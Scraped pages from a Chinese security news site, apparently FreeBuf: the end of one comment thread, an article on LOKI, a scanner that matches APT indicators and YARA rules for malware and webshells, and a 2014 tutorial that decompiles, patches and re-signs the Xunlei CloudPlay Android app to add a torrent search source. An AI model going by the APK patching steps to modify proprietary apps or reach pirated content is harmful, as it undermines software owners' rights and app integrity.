
    加个主动防御。

    亮了(0)
  • Netf?2014-05-09回复7楼

    杀毒软件的目的在于防止黑客侵入电脑。但如今不管有没有杀毒软件的保护,黑客常常会侵入电脑。这句亮了。

    亮了(0)
  • 方坤-Summer?2014-05-09回复8楼

    一项重大的工程

    亮了(0)
  • 郑纯真_GYQ?2014-05-09回复9楼

    三大纷纷被收购的节奏。。

    亮了(0)
  • FlairanWang?2014-05-09回复10楼

    这种思路终于对了。信息安全就是一场博弈,博弈“静态知识”的时代早就过了

    亮了(0)
  • 廣漠李博倫?2014-05-09回复11楼

    所以一直裸机运行…

    亮了(0)
  • Netf?2014-05-09回复12楼

    估计你的电脑什么毒都有。

    亮了(0)
  • firsthoo?2014-05-10回复13楼

    转发微博

    亮了(0)
表情插图

取消

Mystery

Mystery

肆零叁文化传媒 COO

39 篇文章282 条评论

相关阅读

  • 亚洲诚信与腾讯云达成战略合作 携手共建安全云生态
  • 赛门铁克发布2014年安全趋势,大数据、云等均上榜
  • 赛门铁克(Symantec)发布2016年2月威胁情报报告
  • 首款基于“深度学习”的手机安全软件问世,号称可抵御0day攻击
  • 活在Web流量完全加密的世界里:FreeBuf专访赛门铁克全球高级业务发展总监Dean Coclin

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中...

0daybank

loki

loki

投稿

LOKI:一款APT威胁指标扫描软件

clouds2016-08-30239324人围观 ,发现 14 个不明物体工具

24251594622_e70c7947ca.jpg

LOKI是一款APT入侵痕迹扫描软件,以入侵威胁指标(IOC)和黑客工具特征为对象,发现入侵事件和痕迹,其内置的指标特征来自公开发布的事件报告、取证分析和恶意样本等。LOKI由德国信息安全公司Bsk-Consulting开发。

LOKI GitHub:

https://github.com/Neo23x0/Loki

LOKI支持以下四种检测模式:

*匹配文件路径和文件名的IOC检测

*匹配文件数据和进程内存的YARA恶意软件规则检测

*匹配已知恶意软件的MD5 /SHA1/SHA256哈希值检测

*匹配C&C终端连接的网络检测

其它方式检测:

*进程异常检测(基于sysforensics)

*SWF压缩文件检测

*SAM转储检测

*Regin木马文件检测(使用命令 -reginfs)

运行:

(1)克隆LOKI的github库(如果只是下载ZIP文件,请记得下载IOC特征签名子库 signature-base)

(2)提供扫描对象(移动介质、网络共享、文件夹等)

(3)以管理员方式按照命令运行loki.exe

2016-08-27_163825.jpg

LOKI内置的威胁特征库(IOC):

*“方程式组织”Equation Group APT恶意样本-(包括哈希值、卡巴斯基分析的YARA规则和10个通用规则)

*Carbanak APT-卡巴斯基分析的恶意样本哈希值和文件名IOC

*Arid Viper APT-趋势科技分析的恶意样本哈希值

*Regin恶意软件(GCHQ/NSA/FiveEyes相关)-其中的Legspin和Hopscotch模块IOC

*QUERTY 恶意软件(FiveEyes相关)-键盘记录模块IOC

*Skeleton Key APT(国家支持攻击相关)-恶意软件IOC

*WoolenGoldfish APT-SHA1哈希值和YARA规则

*OpCleaver APT(伊朗相关APT活动)-IOC

*其它180多个黑客工具YARA规则

*其它600多个网页后门YARA规则

*大量匹配的可疑文件签名

*……

LOKI收费版:

LOKI的收费版本软件THOR,规则库更强大,扫描功能更深入,请参考THOR

THOR_Overview_en_2-620x338.png

*本文译者:clouds,编译来源:Securityblog,转载须注明来自FreeBuf.COM

这些评论亮了

  • JAZ123321(3级)回复
    不错的扫描软件
    )8(亮了
发表评论

已有 14 条评论

  • JAZ123321?(3级)?2016-08-30回复1楼

    不错的扫描软件

    亮了(8)
  • langyajiekou?(5级)?2016-08-30回复2楼

    提供扫描对象(移动介质、网络共享、文件夹等),是针对文件系统而不是针对机器?

    亮了(4)
  • 死宅10086?(6级)?2016-08-30回复3楼

    看看 :cool:

    亮了(5)
  • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-30回复4楼

    感觉不错,正在测试中。。。看看效果如何。。。

    亮了(4)
    • 墨霝?(2级)?2017-01-12回复

      @ 鬼魅羊羔? 前辈,能问一下安装环境么?

      亮了(1)
  • 看雪网友?2016-08-30回复5楼

    洛基?看来要开发个叫Thor的防护软件

    亮了(5)
  • kurt_nan?(1级)?2016-08-30回复6楼

    咋一看还以为只有windows平台能用呢 :mrgreen:

    亮了(4)
    • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-30回复

      @ kurt_nan? linux平台能用?我这好几个Python2.6和2.7都不行啊。。

      亮了(2)
      • langfeng?(1级)安全的本质是信任,安全的表现是攻防。?2016-08-31回复

        @ 鬼魅羊羔? 我也试了,运行报错,感觉用不了

        亮了(2)
      • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-08-31回复

        @ langfeng? 感觉这东西扫描巨慢。。。巨慢。。。

        亮了(2)
  • hela?2016-08-31回复7楼

    这么取名Marvel同意了吗

    亮了(3)
  • topses?(1级)?2016-09-01回复8楼

    关键是如何只输出[ALERT]告警信息呢?

    亮了(0)
  • 鬼魅羊羔?(4级)网络尖刀的小屌丝一枚。?2016-09-01回复9楼

    optional arguments:
    -h, –help show this help message and exit
    -p path Path to scan
    -s kilobyte Maximum file site to check in KB (default 2000 KB)
    –printAll Print all files that are scanned
    –noprocscan Skip the process scan
    –nofilescan Skip the file scan
    –noindicator Do not show a progress indicator
    –debug Debug output

    参数翻译:
    可选参数:
    -l 路径,log日志输出位置;例如:-l c:\scan.log
    - h,-帮助显示这个帮助信息和退出
    - p,扫描路径路径,例如:loki.exe -p c:\windows\system32\
    - s ,检查的最大文件值(默认2000 KB)
    –printAll,打印所有文件扫描
    –noprocscan,跳过扫描过程
    –nofilescan,跳过文件扫描
    –noindicator,不显示进度指示器
    –debug,调试调试输出

    亮了(0)
  • 墨霝?(2级)?2017-01-12回复10楼

    用不了,各种环境。。各种坑,有人成功么?

    亮了(0)
表情插图

取消

clouds

clouds

I am a robot ,do not talk to me ,code to me.

135 篇文章35 条评论

相关阅读

  • APT防御的他山石—思科内部安全团队解读APT
  • 卡巴斯基辣评2016安全趋势:APT攻击将死,“后门买卖”会更加活跃
  • FireEye:数字面包屑 – 识别APT攻击来源的7大线索
  • 中国黑客被指责曝光了450万患者的信息
  • 探寻APT的化学本质与破解之术

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中...

0daybank

{searchterms}

{searchterms}

投稿

技术宅打造全能美剧播放器

Yaseng2014-04-12+6106789人围观 ,发现 11 个不明物体其他极客

1:前言

看到有同仁发《权力的游戏》自动追剧脚本,老衲也来凑个热闹…

移动端最好的播放器非云播君莫属了,极速而方便,高清而无码,可惜最近资源被和谐,每次有美剧更新需要用浏览器手工添加播放源或者pc端添加,很是麻烦的说。于是就简单diy了下云播1.9 for Android ,使其支持自定义搜索引擎(比如人人影视,xxx资源站等),并且修复了原来搜索结果列表页标题的bug,为了迎接Game of Thrones Season 4 的回归,特记录下修改过程。

2:添加yyets.com搜索引擎

反编译搜索引擎代码
com\xunlei\cloud\action\search\AdviseEngine.java ?89 行

try
????{
??????str?=?SearchAdviceEngineListResp.getDomainName(paramString);
??????if?(str.equalsIgnoreCase("btdigg.org"))
??????{
????????localAdviseEngine.url_pattern?=?"http://btdigg.org/search?q={searchTerms}&p={page}";
????????localAdviseEngine.multi_page?=?true;
????????localAdviseEngine.page_start_point?=?0;
????????return?localAdviseEngine;
??????}
??????if?(str.equalsIgnoreCase("so.com"))
??????{
????????localAdviseEngine.url_pattern?=?"http://www.so.com/s?q={searchTerms}+site%3Abtdigg.org&pn={page}";
????????localAdviseEngine.multi_page?=?true;
????????localAdviseEngine.page_start_point?=?1;
????????return?localAdviseEngine;
??????}
????}
????catch?(URISyntaxException?localURISyntaxException)
????{
??????localURISyntaxException.printStackTrace();
??????return?localAdviseEngine;
????}
????if?(str.equalsIgnoreCase("torrentkitty.com"))
????{
??????localAdviseEngine.url_pattern?=?"http://www.torrentkitty.com/search/{searchTerms}/{page}";
??????localAdviseEngine.multi_page?=?true;
??????localAdviseEngine.page_start_point?=?1;
??????return?localAdviseEngine;
????}
????if?(str.equalsIgnoreCase("kuaichuanmirror.com"))
????{
??????localAdviseEngine.url_pattern?=?"http://www.kuaichuanmirror.com/search/{searchTerms}/";
??????localAdviseEngine.multi_page?=?false;
??????localAdviseEngine.page_start_point?=?1;
????}

挖槽 ?竟然内置四大毛片搜索引擎 !!!
随便改掉一个即可
由于内置引擎只识别磁力链接 需要一个脚本文件来做中转(代码见最后链接)
输出格式为

magnet:?xt=urn:btih:hash1&title1</br>
magnet:?xt=urn:btih:hash2&title2</br>

修改 smali\com\xunlei\cloud\action\search\AdviseEngine.smali ? 239 行

.line?127?
:cond_1?
const-string?v2,?"yyets.com"?
invoke-virtual?{v0,?v2},?Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z?
move-result?v2?
if-eqz?v2,?:cond_2?
.line?128?
const-string?v0,?"http://www.ttst.com/y2c.php?keyword={searchTerms}&page={page}"?
iput-object?v0,?v1,?Lcom/xunlei/cloud/action/search/AdviseEngine;->url_pattern:Ljava/lang/String;
.line?129?
const/4?v0,?0x1

3:修正标题bug

云播在使用第三方搜索引擎时,发现结果列表页面的标题全部是随机的字符串

查看对应的dalvik代码
smali\com\xunlei\cloud\action\search\AdviseEngine.smali? ?990行

const-string?v0,?"magnet:\\?xt=urn:btih:([A-Za-z\\d]{32,})&?"??????//批量正则???遍历结果数组
??.....
?invoke-static?{v0,?v1},?Ljava/util/regex/Pattern;->compile(Ljava/lang/String;I)Ljava/util/regex/Pattern;
?.....
?invoke-virtual?{v5},?Ljava/util/regex/Matcher;->find()Z
move-result-object?v0
?.line?88
?invoke-virtual?{v0},?Ljava/lang/String;->length()I
move-result?v1
add-int/lit8?v1,?v1,?-0x1
?invoke-virtual?{v0,?v1},?Ljava/lang/String;->charAt(I)C?
move-result?v1
.line?89
const/16?v6,?0x26
if-ne?v1,?v6,?:cond_4
.line?90
invoke-virtual?{v0},?Ljava/lang/String;->length()I
move-result?v1
add-int/lit8?v1,?v1,?-0x1
invoke-virtual?{v0,?v3,?v1},?Ljava/lang/String;->substring(II)Ljava/lang/String;
?move-result-object?v0
????move-object?v1,?v0
????.line?92
????:goto_1
????const/16?v0,?0x14
????invoke-virtual?{v1},?Ljava/lang/String;->length()I
????move-result?v6
????invoke-virtual?{v1,?v0,?v6},?Ljava/lang/String;->substring(II)Ljava/lang/String;
????move-result-object?v0
????.line?93
????invoke-static
?{v0,?v2},?
Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;I)Ljava/lang/String;
?//?str2.substring(20,?str2.length())
????move-result-object?v6
?......
.line?105?
iput-object?v6,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
.line?106?
?iput-object?v1,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
.line?107?
?iput-object?v6,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;

可以看到,标题被直接赋值给 ?magnet 的 hash 了 ?…..
修改为

ArrayList?localArrayList?=?new?ArrayList();
??Matcher?localMatcher?=?Pattern.compile(".*?</br>",?2).matcher(???//中转脚本每行用</br>?分割
????paramString);
??if?(!localMatcher.find())?{
???return;
??}
??String?str1;
??str1?=?localMatcher.group();
??for?(String?str2?=?str1.substring(0,?60);;?str2?=?str1)?{
???String?str3?=?str2.substring(20,?60);
???String?str4?=?str1.substring(61,?str1.length()?-?5);
???SnifferData?localSnifferData?=?new?SnifferData();
???localSnifferData.title?=?str4;
???localSnifferData.url?=?str2;
???localSnifferData.hash?=?str3;
???localArrayList.add(localSnifferData);
???break;
??}

对应的dalvik 代码(具体见后面链接)

locals?15?//15个寄存器
const-string?v0,?".*?</br>"
const/4?v10,?0x0
const/16?v11,?0x3c?//?60
const/16?v12,?0x3d?//61
const/4?v1,?0x2
invoke-static?{v0,?v1},?Ljava/util/regex/Pattern;->compile(Ljava/lang/String;I)Ljava/util/regex/Pattern;
move-result-object?v0
invoke-virtual?{v0,?v10,?v11},?Ljava/lang/String;->substring(II)Ljava/lang/String;
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
move-result-object?v8
move-object?v1,?v8
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
.line?92
:goto_1
move-object?v9,?v0?????//?copy?一份v0???magnet:?xt=urn:btih:hash&title
const/16?v0,?0x14
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
invoke-virtual?{v1},?Ljava/lang/String;->length()I
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
........
new-instance?v0,?Lcom/xunlei/cloud/action/search/SnifferData;
invoke-direct?{v0},?Lcom/xunlei/cloud/action/search/SnifferData;-><init>()V
invoke-virtual?{v9},?Ljava/lang/String;->length()I
move-result?v13
add-int/lit8?v13,?v13,?-0x5
invoke-virtual?{v9,?v12,?v13},?Ljava/lang/String;->substring(II)Ljava/lang/String;
move-result-object?v14
.line?105
iput-object?v14,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
.line?106
iput-object?v1,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
??????????????????????????????????????????????????????????????????????????????????????????????????????????????
.line?107
iput-object?v6,?v0,?Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;

4:回编译错误处理

java?-jar?apktool.jar?b?CloudPlay_ybappgw?c1.apk
libpng?error:?Not?a?PNG?file
ERROR:?Failure?processing?PNG?image?F:\Pentest\Ya?
Tools\pendroid\apktool1.5.2\CloudPlay_ybappgw\res\drawable-hdpi\local_list_view_item_color.png

不是真正的png文件??看了下文件头??bmp…??改过来 继续

ERROR:?9-patch?image?F:\Pentest\Ya?
Tools\pendroid\apktool1.5.2\CloudPlay_ybappgw\res\drawable-hdpi\progressbar_local_item.9.png
malformed.

把三个文件全部改成普通 png格式 progressbar_local_item.9.png => progressbar_local_item.png

apktool?b?CloudPlay_ybappgw?c1.apk
I:?Checking?whether?sources?has?changed...
I:?Smaling...
I:?Checking?whether?resources?has?changed...
I:?Building?apk?file...

成功编译成apk 文件

5:测试结果

签名? 安装到手机

java?-jar?signapk.jar?testkey.x509.pem?testkey.pk8?c1.apk?c1_s.apk
adb?install?-r?c1_s.apk

截图

6:链接

中转脚本: ?? https://github.com/yaseng/pentest/blob/master/project/diy_cloudplay/y2c.php
g.smali ? ?: https://github.com/yaseng/pentest/blob/master/project/diy_cloudplay/g.smali
smali 语法 : https://code.google.com/p/smali/w/list
Av Top 10: ? http://movie.douban.com/doulist/3822549

这些评论亮了

  • topsex大哥组(1级)回复
    ?
    )9(亮了
  • sex8回复
    ? 好福利啊
    )7(亮了
  • 宅娘回复
    acgcomic.com
    )6(亮了
发表评论

已有 11 条评论

  • topsex大哥组?(1级)?2014-04-12回复1楼

    :eek:

    亮了(9)
  • 宅娘?2014-04-12回复2楼

    acgcomic.com

    亮了(6)
    • green hat?2014-05-06回复

      @宅娘 这是什么打不开

      亮了(1)
  • WeirdBird007?(3级)干过开发,日过渗透,某乙方渗透>_< '...?2014-04-12回复3楼

    我去.. 居然有 so.com = = 这个 能搜 ?

    亮了(5)
  • 技术宅?(1级)?2014-04-12回复4楼

    我肯定不是我打造的虽然我是技术宅~

    亮了(2)
  • 佟曉輝同學?2014-04-12回复5楼

    转发微博

    亮了(0)
  • GeminiDylan?2014-04-12回复6楼

    膜拜

    亮了(0)
  • 麦田一根葱?2014-04-14回复7楼

    :eek: 惊呆了

    亮了(1)
  • sex8?2014-04-15回复8楼

    :!: 好福利啊

    亮了(7)
  • 猫友?(1级)?2014-07-23回复9楼

    惊呆了

    亮了(0)
  • 老司机?2016-03-26回复10楼

    就这样不知不觉的开了一趟车,连我都自叹不如。

    亮了(0)
表情插图

取消

Yaseng

Yaseng

看毛片 www.yaseng.me

4 篇文章2 条评论

相关阅读

  • 有才!网友制作的Freebuf壁纸(更新)
  • 美国军方确认存在“钢铁侠武器套装”
  • freebuf安全周刊2012年5月28日-6月3日
  • Wifi密码破解实战
  • 关于“RFID破解两三事”的一些事

特别推荐

关注我们 分享每日精选文章

不容错过

  • [Blackhat]2014美国黑帽大会有哪些精彩的议题?FB情报组2014-08-07
  • 如何基于菜刀PHP一句话实现单个文件批量上传?安全小飞侠2015-12-28
  • FreeBuf公开课:Wi-Fi安全与渗透测试(第一集)FB视频2015-03-25
  • Hacking Team流量攻击之EXE攻击分析LiukerTeam2016-01-23

css.php

正在加载中...

0daybank